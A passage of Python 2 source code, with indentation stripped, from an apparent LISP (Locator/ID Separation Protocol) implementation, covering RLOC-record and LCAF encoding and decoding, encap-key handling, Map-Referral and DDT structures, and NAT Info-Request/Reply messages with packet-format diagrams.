return("{}{}{}".format("L" if self.local_bit else "l", "P" \
if self.probe_bit else "p", "R" if self.reach_bit else "r"))
#enddef
def store_rloc_entry(self, rloc_entry):
rloc = rloc_entry.rloc if (rloc_entry.translated_rloc.is_null()) \
else rloc_entry.translated_rloc
self.rloc.copy_address(rloc)
if (rloc_entry.rloc_name):
self.rloc_name = rloc_entry.rloc_name
#endif
if (rloc_entry.geo):
self.geo = rloc_entry.geo
else:
name = rloc_entry.geo_name
if (name and lisp_geo_list.has_key(name)):
self.geo = lisp_geo_list[name]
#endif
#endif
if (rloc_entry.elp):
self.elp = rloc_entry.elp
else:
name = rloc_entry.elp_name
if (name and lisp_elp_list.has_key(name)):
self.elp = lisp_elp_list[name]
#endif
#endif
if (rloc_entry.rle):
self.rle = rloc_entry.rle
else:
name = rloc_entry.rle_name
if (name and lisp_rle_list.has_key(name)):
self.rle = lisp_rle_list[name]
#endif
#endif
if (rloc_entry.json):
self.json = rloc_entry.json
else:
name = rloc_entry.json_name
if (name and lisp_json_list.has_key(name)):
self.json = lisp_json_list[name]
#endif
#endif
self.priority = rloc_entry.priority
self.weight = rloc_entry.weight
self.mpriority = rloc_entry.mpriority
self.mweight = rloc_entry.mweight
#enddef
def encode_json(self, lisp_json):
json_string = lisp_json.json_string
kid = 0
if (lisp_json.json_encrypted):
kid = (lisp_json.json_key_id << 5) | 0x02
#endif
lcaf_type = LISP_LCAF_JSON_TYPE
lcaf_afi = socket.htons(LISP_AFI_LCAF)
addr_len = self.rloc.addr_length() + 2
lcaf_len = socket.htons(len(json_string) + addr_len)
json_len = socket.htons(len(json_string))
packet = struct.pack("HBBBBHH", lcaf_afi, 0, 0, lcaf_type, kid,
lcaf_len, json_len)
packet += json_string
#
# If telemetry, store RLOC address in LCAF.
#
if (lisp_is_json_telemetry(json_string)):
packet += struct.pack("H", socket.htons(self.rloc.afi))
packet += self.rloc.pack_address()
else:
packet += struct.pack("H", 0)
#endif
return(packet)
#enddef
def encode_lcaf(self):
lcaf_afi = socket.htons(LISP_AFI_LCAF)
gpkt = ""
if (self.geo):
gpkt = self.geo.encode_geo()
#endif
epkt = ""
if (self.elp):
elp_recs = ""
for elp_node in self.elp.elp_nodes:
afi = socket.htons(elp_node.address.afi)
flags = 0
if (elp_node.eid): flags |= 0x4
if (elp_node.probe): flags |= 0x2
if (elp_node.strict): flags |= 0x1
flags = socket.htons(flags)
elp_recs += struct.pack("HH", flags, afi)
elp_recs += elp_node.address.pack_address()
#endfor
elp_len = socket.htons(len(elp_recs))
epkt = struct.pack("HBBBBH", lcaf_afi, 0, 0, LISP_LCAF_ELP_TYPE,
0, elp_len)
epkt += elp_recs
#endif
rpkt = ""
if (self.rle):
rle_recs = ""
for rle_node in self.rle.rle_nodes:
afi = socket.htons(rle_node.address.afi)
rle_recs += struct.pack("HBBH", 0, 0, rle_node.level, afi)
rle_recs += rle_node.address.pack_address()
if (rle_node.rloc_name):
rle_recs += struct.pack("H", socket.htons(LISP_AFI_NAME))
rle_recs += rle_node.rloc_name + "\0"
#endif
#endfor
rle_len = socket.htons(len(rle_recs))
rpkt = struct.pack("HBBBBH", lcaf_afi, 0, 0, LISP_LCAF_RLE_TYPE,
0, rle_len)
rpkt += rle_recs
#endif
jpkt = ""
if (self.json):
jpkt = self.encode_json(self.json)
#endif
spkt = ""
if (self.rloc.is_null() == False and self.keys and self.keys[1]):
spkt = self.keys[1].encode_lcaf(self.rloc)
#endif
npkt = ""
if (self.rloc_name):
npkt += struct.pack("H", socket.htons(LISP_AFI_NAME))
npkt += self.rloc_name + "\0"
#endif
apkt_len = len(gpkt) + len(epkt) + len(rpkt) + len(spkt) + 2 + \
len(jpkt) + self.rloc.addr_length() + len(npkt)
apkt_len = socket.htons(apkt_len)
apkt = struct.pack("HBBBBHH", lcaf_afi, 0, 0, LISP_LCAF_AFI_LIST_TYPE,
0, apkt_len, socket.htons(self.rloc.afi))
apkt += self.rloc.pack_address()
return(apkt + npkt + gpkt + epkt + rpkt + spkt + jpkt)
#enddef
def encode(self):
flags = 0
if (self.local_bit): flags |= 0x0004
if (self.probe_bit): flags |= 0x0002
if (self.reach_bit): flags |= 0x0001
packet = struct.pack("BBBBHH", self.priority, self.weight,
self.mpriority, self.mweight, socket.htons(flags),
socket.htons(self.rloc.afi))
if (self.geo or self.elp or self.rle or self.keys or self.rloc_name \
or self.json):
packet = packet[0:-2] + self.encode_lcaf()
else:
packet += self.rloc.pack_address()
#endif
return(packet)
#enddef
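    #
    # Worked example (illustrative): a reachable RLOC that is neither local
    # nor being probed has flags 0x0001 and print_flags() renders "lpR"; a
    # local, reachable RLOC has flags 0x0005 and renders "LpR".
    #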
def decode_lcaf(self, packet, nonce, ms_json_encrypt):
packet_format = "HBBBBH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
afi, rsvd1, flags, lcaf_type, rsvd2, lcaf_len = \
struct.unpack(packet_format, packet[:format_size])
lcaf_len = socket.ntohs(lcaf_len)
packet = packet[format_size::]
if (lcaf_len > len(packet)): return(None)
#
# Process AFI-List LCAF.
#
if (lcaf_type == LISP_LCAF_AFI_LIST_TYPE):
while (lcaf_len > 0):
packet_format = "H"
format_size = struct.calcsize(packet_format)
if (lcaf_len < format_size): return(None)
packet_len = len(packet)
afi = struct.unpack(packet_format, packet[:format_size])[0]
afi = socket.ntohs(afi)
if (afi == LISP_AFI_LCAF):
packet = self.decode_lcaf(packet, nonce, ms_json_encrypt)
if (packet == None): return(None)
else:
packet = packet[format_size::]
self.rloc_name = None
if (afi == LISP_AFI_NAME):
packet, rloc_name = lisp_decode_dist_name(packet)
self.rloc_name = rloc_name
else:
self.rloc.afi = afi
packet = self.rloc.unpack_address(packet)
if (packet == None): return(None)
self.rloc.mask_len = self.rloc.host_mask_len()
#endif
#endif
lcaf_len -= packet_len - len(packet)
#endwhile
elif (lcaf_type == LISP_LCAF_GEO_COORD_TYPE):
#
# Process Geo-Coordinate LCAF.
#
geo = lisp_geo("")
packet = geo.decode_geo(packet, lcaf_len, rsvd2)
if (packet == None): return(None)
self.geo = geo
elif (lcaf_type == LISP_LCAF_JSON_TYPE):
encrypted_json = rsvd2 & 0x02
#
# Process JSON LCAF.
#
packet_format = "H"
format_size = struct.calcsize(packet_format)
if (lcaf_len < format_size): return(None)
json_len = struct.unpack(packet_format, packet[:format_size])[0]
json_len = socket.ntohs(json_len)
if (lcaf_len < format_size + json_len): return(None)
packet = packet[format_size::]
self.json = lisp_json("", packet[0:json_len], encrypted_json,
ms_json_encrypt)
packet = packet[json_len::]
#
# If telemetry, store RLOC address in LCAF.
#
afi = socket.ntohs(struct.unpack("H", packet[:2])[0])
packet = packet[2::]
if (afi != 0 and lisp_is_json_telemetry(self.json.json_string)):
self.rloc.afi = afi
packet = self.rloc.unpack_address(packet)
#endif
elif (lcaf_type == LISP_LCAF_ELP_TYPE):
#
# Process ELP LCAF.
#
elp = lisp_elp(None)
elp.elp_nodes = []
while (lcaf_len > 0):
flags, afi = struct.unpack("HH", packet[:4])
afi = socket.ntohs(afi)
if (afi == LISP_AFI_LCAF): return(None)
elp_node = lisp_elp_node()
elp.elp_nodes.append(elp_node)
flags = socket.ntohs(flags)
elp_node.eid = (flags & 0x4)
elp_node.probe = (flags & 0x2)
elp_node.strict = (flags & 0x1)
elp_node.address.afi = afi
elp_node.address.mask_len = elp_node.address.host_mask_len()
packet = elp_node.address.unpack_address(packet[4::])
lcaf_len -= elp_node.address.addr_length() + 4
#endwhile
elp.select_elp_node()
self.elp = elp
elif (lcaf_type == LISP_LCAF_RLE_TYPE):
#
# Process RLE LCAF.
#
rle = lisp_rle(None)
rle.rle_nodes = []
while (lcaf_len > 0):
x, y, level, afi = struct.unpack("HBBH", packet[:6])
afi = socket.ntohs(afi)
if (afi == LISP_AFI_LCAF): return(None)
rle_node = lisp_rle_node()
rle.rle_nodes.append(rle_node)
rle_node.level = level
rle_node.address.afi = afi
rle_node.address.mask_len = rle_node.address.host_mask_len()
packet = rle_node.address.unpack_address(packet[6::])
lcaf_len -= rle_node.address.addr_length() + 6
if (lcaf_len >= 2):
afi = struct.unpack("H", packet[:2])[0]
if (socket.ntohs(afi) == LISP_AFI_NAME):
packet = packet[2::]
packet, rle_node.rloc_name = \
lisp_decode_dist_name(packet)
if (packet == None): return(None)
lcaf_len -= len(rle_node.rloc_name) + 1 + 2
#endif
#endif
#endwhile
self.rle = rle
self.rle.build_forwarding_list()
elif (lcaf_type == LISP_LCAF_SECURITY_TYPE):
#
# Get lisp_key() data structure so we can parse keys in the Map-
# Reply RLOC-record. Then get the RLOC address.
#
orig_packet = packet
decode_key = lisp_keys(1)
packet = decode_key.decode_lcaf(orig_packet, lcaf_len, False)
if (packet == None): return(None)
#
# Other side may not do ECDH.
#
cs_list = [LISP_CS_25519_CBC, LISP_CS_25519_CHACHA]
if (decode_key.cipher_suite in cs_list):
if (decode_key.cipher_suite == LISP_CS_25519_CBC):
key = lisp_keys(1, do_poly=False, do_chacha=False)
#endif
if (decode_key.cipher_suite == LISP_CS_25519_CHACHA):
key = lisp_keys(1, do_poly=True, do_chacha=True)
#endif
else:
key = lisp_keys(1, do_poly=False, do_chacha=False)
#endif
packet = key.decode_lcaf(orig_packet, lcaf_len, False)
if (packet == None): return(None)
if (len(packet) < 2): return(None)
afi = struct.unpack("H", packet[:2])[0]
self.rloc.afi = socket.ntohs(afi)
if (len(packet) < self.rloc.addr_length()): return(None)
packet = self.rloc.unpack_address(packet[2::])
if (packet == None): return(None)
self.rloc.mask_len = self.rloc.host_mask_len()
#
# Some RLOC records may not have RLOC addresses but other LCAF
# types. Don't process security keys because we need RLOC addresses
# to index into security data structures.
#
if (self.rloc.is_null()): return(packet)
rloc_name_str = self.rloc_name
if (rloc_name_str): rloc_name_str = blue(self.rloc_name, False)
#
# If we found no stored key, store the newly created lisp_keys()
# to the RLOC list if and only if a remote public-key was supplied
# in the Map-Reply.
#
stored_key = self.keys[1] if self.keys else None
if (stored_key == None):
if (key.remote_public_key == None):
string = bold("No remote encap-public-key supplied", False)
lprint(" {} for {}".format(string, rloc_name_str))
key = None
else:
string = bold("New encap-keying with new state", False)
lprint(" {} for {}".format(string, rloc_name_str))
key.compute_shared_key("encap")
#endif
#endif
#
# If we have stored-key, the other side received the local public
# key that is stored in variable 'stored_key'. If the remote side
# did not supply a public-key, it doesn't want to do lisp-crypto.
# If it did supply a public key, check to see if the same as
# last time, and if so, do nothing, else we do a rekeying.
#
if (stored_key):
if (key.remote_public_key == None):
key = None
remote = bold("Remote encap-unkeying occurred", False)
lprint(" {} for {}".format(remote, rloc_name_str))
elif (stored_key.compare_keys(key)):
key = stored_key
lprint(" Maintain stored encap-keys for {}".format( \
rloc_name_str))
else:
if (stored_key.remote_public_key == None):
string = "New encap-keying for existing state"
else:
string = "Remote encap-rekeying"
#endif
lprint(" {} for {}".format(bold(string, False),
rloc_name_str))
stored_key.remote_public_key = key.remote_public_key
stored_key.compute_shared_key("encap")
key = stored_key
#endif
#endif
self.keys = [None, key, None, None]
else:
#
# All other LCAFs we skip over and ignore.
#
packet = packet[lcaf_len::]
#endif
return(packet)
#enddef
def decode(self, packet, nonce, ms_json_encrypt=False):
packet_format = "BBBBHH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
self.priority, self.weight, self.mpriority, self.mweight, flags, \
afi = struct.unpack(packet_format, packet[:format_size])
flags = socket.ntohs(flags)
afi = socket.ntohs(afi)
self.local_bit = True if (flags & 0x0004) else False
self.probe_bit = True if (flags & 0x0002) else False
self.reach_bit = True if (flags & 0x0001) else False
if (afi == LISP_AFI_LCAF):
packet = packet[format_size-2::]
packet = self.decode_lcaf(packet, nonce, ms_json_encrypt)
else:
self.rloc.afi = afi
packet = packet[format_size::]
packet = self.rloc.unpack_address(packet)
#endif
self.rloc.mask_len = self.rloc.host_mask_len()
return(packet)
#enddef
def end_of_rlocs(self, packet, rloc_count):
for i in range(rloc_count):
packet = self.decode(packet, None, False)
if (packet == None): return(None)
#endfor
return(packet)
#enddef
#endclass
#
# Map-Referral Message Format
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |Type=6 | Reserved | Record Count |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Nonce . . . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . . . Nonce |
# +-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | | Record TTL |
# | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# R | Referral Count| EID mask-len | ACT |A|I| Reserved |
# e +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# c |SigCnt | Map Version Number | EID-AFI |
# o +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# r | EID-prefix ... |
# d +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | /| Priority | Weight | M Priority | M Weight |
# | L +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | o | Unused Flags |R| Loc/LCAF-AFI |
# | c +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | \| Locator ... |
# +-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
class lisp_map_referral():
def __init__(self):
self.record_count = 0
self.nonce = 0
#enddef
def print_map_referral(self):
lprint("{} -> record-count: {}, nonce: 0x{}".format( \
bold("Map-Referral", False), self.record_count,
lisp_hex_string(self.nonce)))
#enddef
def encode(self):
first_long = (LISP_MAP_REFERRAL << 28) | self.record_count
packet = struct.pack("I", socket.htonl(first_long))
packet += struct.pack("Q", self.nonce)
return(packet)
#enddef
def decode(self, packet):
packet_format = "I"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
first_long = struct.unpack(packet_format, packet[:format_size])
first_long = socket.ntohl(first_long[0])
self.record_count = first_long & 0xff
packet = packet[format_size::]
packet_format = "Q"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
self.nonce = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
return(packet)
#enddef
#endclass
#
# This is a DDT cache type data structure that holds information configured
# in the "lisp ddt-authoritative-prefix" and "lisp delegate" commands. The
# self.delegation_set[] is a list of lisp_ddt_node()s.
#
class lisp_ddt_entry():
def __init__(self):
self.eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.group = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.uptime = lisp_get_timestamp()
self.delegation_set = []
self.source_cache = None
self.map_referrals_sent = 0
#enddef
def is_auth_prefix(self):
if (len(self.delegation_set) != 0): return(False)
if (self.is_star_g()): return(False)
return(True)
#enddef
def is_ms_peer_entry(self):
if (len(self.delegation_set) == 0): return(False)
return(self.delegation_set[0].is_ms_peer())
#enddef
def print_referral_type(self):
if (len(self.delegation_set) == 0): return("unknown")
ddt_node = self.delegation_set[0]
return(ddt_node.print_node_type())
#enddef
def print_eid_tuple(self):
return(lisp_print_eid_tuple(self.eid, self.group))
#enddef
def add_cache(self):
if (self.group.is_null()):
lisp_ddt_cache.add_cache(self.eid, self)
else:
ddt = lisp_ddt_cache.lookup_cache(self.group, True)
if (ddt == None):
ddt = lisp_ddt_entry()
ddt.eid.copy_address(self.group)
ddt.group.copy_address(self.group)
lisp_ddt_cache.add_cache(self.group, ddt)
#endif
if (self.eid.is_null()): self.eid.make_default_route(ddt.group)
ddt.add_source_entry(self)
#endif
#enddef
def add_source_entry(self, source_ddt):
if (self.source_cache == None): self.source_cache = lisp_cache()
self.source_cache.add_cache(source_ddt.eid, source_ddt)
#enddef
def lookup_source_cache(self, source, exact):
if (self.source_cache == None): return(None)
return(self.source_cache.lookup_cache(source, exact))
#enddef
def is_star_g(self):
if (self.group.is_null()): return(False)
return(self.eid.is_exact_match(self.group))
#enddef
#endclass
class lisp_ddt_node():
def __init__(self):
self.delegate_address = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.public_key = ""
self.map_server_peer = False
self.map_server_child = False
self.priority = 0
self.weight = 0
#enddef
def print_node_type(self):
if (self.is_ddt_child()): return("ddt-child")
if (self.is_ms_child()): return("map-server-child")
if (self.is_ms_peer()): return("map-server-peer")
#enddef
def is_ddt_child(self):
if (self.map_server_child): return(False)
if (self.map_server_peer): return(False)
return(True)
#enddef
def is_ms_child(self):
return(self.map_server_child)
#enddef
def is_ms_peer(self):
return(self.map_server_peer)
#enddef
#endclass
#
# This is a Map-Request queue used on a Map-Resolver when waiting for a
# Map-Referral to be returned by a DDT-node or a Map-Server.
#
class lisp_ddt_map_request():
def __init__(self, lisp_sockets, packet, eid, group, nonce):
self.uptime = lisp_get_timestamp()
self.lisp_sockets = lisp_sockets
self.packet = packet
self.eid = eid
self.group = group
self.nonce = nonce
self.mr_source = None
self.sport = 0
self.itr = None
self.retry_count = 0
self.send_count = 0
self.retransmit_timer = None
self.last_request_sent_to = None
self.from_pitr = False
self.tried_root = False
self.last_cached_prefix = [None, None]
#enddef
def print_ddt_map_request(self):
lprint("Queued Map-Request from {}ITR {}->{}, nonce 0x{}".format( \
"P" if self.from_pitr else "",
red(self.itr.print_address(), False),
green(self.eid.print_address(), False), self.nonce))
#enddef
def queue_map_request(self):
self.retransmit_timer = threading.Timer(LISP_DDT_MAP_REQUEST_INTERVAL,
lisp_retransmit_ddt_map_request, [self])
self.retransmit_timer.start()
lisp_ddt_map_requestQ[str(self.nonce)] = self
#enddef
def dequeue_map_request(self):
self.retransmit_timer.cancel()
if (lisp_ddt_map_requestQ.has_key(str(self.nonce))):
lisp_ddt_map_requestQ.pop(str(self.nonce))
#endif
#enddef
def print_eid_tuple(self):
return(lisp_print_eid_tuple(self.eid, self.group))
#enddef
#endclass
#
# -------------------------------------------------------------------
# Type (Action field) Incomplete Referral-set TTL values
# -------------------------------------------------------------------
# 0 NODE-REFERRAL NO YES 1440
#
# 1 MS-REFERRAL NO YES 1440
#
# 2 MS-ACK * * 1440
#
# 3 MS-NOT-REGISTERED * * 1
#
# 4 DELEGATION-HOLE NO NO 15
#
# 5 NOT-AUTHORITATIVE YES NO 0
# -------------------------------------------------------------------
#
LISP_DDT_ACTION_SITE_NOT_FOUND = -2
LISP_DDT_ACTION_NULL = -1
LISP_DDT_ACTION_NODE_REFERRAL = 0
LISP_DDT_ACTION_MS_REFERRAL = 1
LISP_DDT_ACTION_MS_ACK = 2
LISP_DDT_ACTION_MS_NOT_REG = 3
LISP_DDT_ACTION_DELEGATION_HOLE = 4
LISP_DDT_ACTION_NOT_AUTH = 5
LISP_DDT_ACTION_MAX = LISP_DDT_ACTION_NOT_AUTH
lisp_map_referral_action_string = [
"node-referral", "ms-referral", "ms-ack", "ms-not-registered",
"delegation-hole", "not-authoritative"]
#
# Info-Request/Reply
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |Type=7 |R| Reserved |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Nonce . . . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . . . Nonce |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Key ID | Authentication Data Length |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# ~ Authentication Data ~
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | TTL |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Reserved | EID mask-len | EID-prefix-AFI |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | EID-prefix |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# Info-Request specific information follows the EID-prefix (which has
# EID-prefix-AFI set to 0). The field appended below is either a hostname
# (AFI=17) or nothing (AFI=0):
#
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 17 | <hostname--null-terminated> |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 0 | <Nothing Follows AFI=0> |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# Info-Reply specific information following the EID-prefix:
#
# +->+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | | AFI = 16387 | Rsvd1 | Flags |
# | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | | Type = 7 | Rsvd2 | 4 + n |
# | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# N | MS UDP Port Number | ETR UDP Port Number |
# A +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# T | AFI = x | Global ETR RLOC Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# L | AFI = x | MS RLOC Address ... |
# C +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# A | AFI = x | Private ETR RLOC Address ... |
# F +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | | AFI = x | RTR RLOC Address 1 ... |
# | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | | AFI = x | RTR RLOC Address n ... |
# +->+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# This encoding will not use authentication so we respond to anyone who
# sends an Info-Request. And the EID-prefix will have AFI=0.
#
class lisp_info():
def __init__(self):
self.info_reply = False
self.nonce = 0
self.private_etr_rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.global_etr_rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.global_ms_rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.ms_port = 0
self.etr_port = 0
self.rtr_list = []
self.hostname = lisp_hostname
#enddef
def print_info(self):
if (self.info_reply):
req_or_reply = "Info-Reply"
rloc = (", ms-port: {}, etr-port: {}, global-rloc: {}, " + \
"ms-rloc: {}, private-rloc: {}, RTR-list: ").format( \
self.ms_port, self.etr_port,
red(self.global_etr_rloc.print_address_no_iid(), False),
red(self.global_ms_rloc.print_address_no_iid(), False),
red(self.private_etr_rloc.print_address_no_iid(), False))
if (len(self.rtr_list) == 0): rloc += "empty, "
for rtr in self.rtr_list:
rloc += red(rtr.print_address_no_iid(), False) + ", "
#endfor
rloc = rloc[0:-2]
else:
req_or_reply = "Info-Request"
hostname = "<none>" if self.hostname == None else self.hostname
rloc = ", hostname: {}".format(blue(hostname, False))
#endif
lprint("{} -> nonce: 0x{}{}".format(bold(req_or_reply, False),
lisp_hex_string(self.nonce), rloc))
#enddef
def encode(self):
first_long = (LISP_NAT_INFO << 28)
if (self.info_reply): first_long |= (1 << 27)
#
# Encode first-long, nonce, key-id longword, TTL and EID mask-len/
# EID-prefix AFI. There is no auth data field since auth len is 0.
# Zero out key-id, auth-data-len, ttl, reserved, eid-mask-len, and
# eid-prefix-afi.
#
packet = struct.pack("I", socket.htonl(first_long))
packet += struct.pack("Q", self.nonce)
packet += struct.pack("III", 0, 0, 0)
#
# Add hostname null terminated string with AFI 17.
#
if (self.info_reply == False):
if (self.hostname == None):
packet += struct.pack("H", 0)
else:
packet += struct.pack("H", socket.htons(LISP_AFI_NAME))
packet += self.hostname + "\0"
#endif
return(packet)
#endif
#
# If Info-Reply, encode Type 7 LCAF.
#
afi = socket.htons(LISP_AFI_LCAF)
lcaf_type = LISP_LCAF_NAT_TYPE
lcaf_len = socket.htons(16)
ms_port = socket.htons(self.ms_port)
etr_port = socket.htons(self.etr_port)
packet += struct.pack("HHBBHHHH", afi, 0, lcaf_type, 0, lcaf_len,
ms_port, etr_port, socket.htons(self.global_etr_rloc.afi))
packet += self.global_etr_rloc.pack_address()
packet += struct.pack("HH", 0, socket.htons(self.private_etr_rloc.afi))
packet += self.private_etr_rloc.pack_address()
if (len(self.rtr_list) == 0): packet += struct.pack("H", 0)
#
# Encode RTR list.
#
for rtr in self.rtr_list:
packet += struct.pack("H", socket.htons(rtr.afi))
packet += rtr.pack_address()
#endfor
return(packet)
#enddef
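    #
    # Worked example (illustrative): an Info-Request encodes its first
    # long-word as (LISP_NAT_INFO << 28) = 0x70000000, and an Info-Reply
    # additionally sets the R-bit (1 << 27), giving 0x78000000.
    #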
def decode(self, packet):
orig_packet = packet
packet_format = "I"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
first_long = struct.unpack(packet_format, packet[:format_size])
first_long = first_long[0]
packet = packet[format_size::]
packet_format = "Q"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
nonce = struct.unpack(packet_format, packet[:format_size])
first_long = socket.ntohl(first_long)
self.nonce = nonce[0]
self.info_reply = first_long & 0x08000000
self.hostname = None
packet = packet[format_size::]
#
# Parse key-id, auth-len, auth-data, and EID-record. We don't support
# any of these. On encode, we set 3 longs worth of 0.
#
packet_format = "HH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
#
# If an LCAF value appears in the key-id field, then this is an
# old style Echo-Reply (that NX-OS implemented).
#
key_id, auth_len = struct.unpack(packet_format, packet[:format_size])
if (auth_len != 0): return(None)
packet = packet[format_size::]
packet_format = "IBBH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
ttl, rsvd, ml, eid_afi = struct.unpack(packet_format,
packet[:format_size])
if (eid_afi != 0): return(None)
packet = packet[format_size::]
#
# Check if name supplied.
#
if (self.info_reply == False):
packet_format = "H"
format_size = struct.calcsize(packet_format)
if (len(packet) >= format_size):
afi = struct.unpack(packet_format, packet[:format_size])[0]
if (socket.ntohs(afi) == LISP_AFI_NAME):
packet = packet[format_size::]
packet, self.hostname = lisp_decode_dist_name(packet)
#endif
#endif
return(orig_packet)
#endif
#
# Process Info-Reply.
#
packet_format = "HHBBHHH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
afi, x, lcaf_type, rsvd, lcaf_len, ms_port, etr_port = \
struct.unpack(packet_format, packet[:format_size])
if (socket.ntohs(afi) != LISP_AFI_LCAF): return(None)
self.ms_port = socket.ntohs(ms_port)
self.etr_port = socket.ntohs(etr_port)
packet = packet[format_size::]
#
# Get addresses one AFI at a time.
#
packet_format = "H"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
#
# Get global ETR RLOC address.
#
afi = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
if (afi != 0):
self.global_etr_rloc.afi = socket.ntohs(afi)
packet = self.global_etr_rloc.unpack_address(packet)
if (packet == None): return(None)
self.global_etr_rloc.mask_len = \
self.global_etr_rloc.host_mask_len()
#endif
#
# Get global MS RLOC address.
#
if (len(packet) < format_size): return(orig_packet)
afi = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
if (afi != 0):
self.global_ms_rloc.afi = socket.ntohs(afi)
packet = self.global_ms_rloc.unpack_address(packet)
if (packet == None): return(orig_packet)
self.global_ms_rloc.mask_len = self.global_ms_rloc.host_mask_len()
#endif
#
# Get private ETR RLOC address.
#
if (len(packet) < format_size): return(orig_packet)
afi = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
if (afi != 0):
self.private_etr_rloc.afi = socket.ntohs(afi)
packet = self.private_etr_rloc.unpack_address(packet)
if (packet == None): return(orig_packet)
self.private_etr_rloc.mask_len = \
self.private_etr_rloc.host_mask_len()
#endif
#
# Get RTR list if any.
#
while (len(packet) >= format_size):
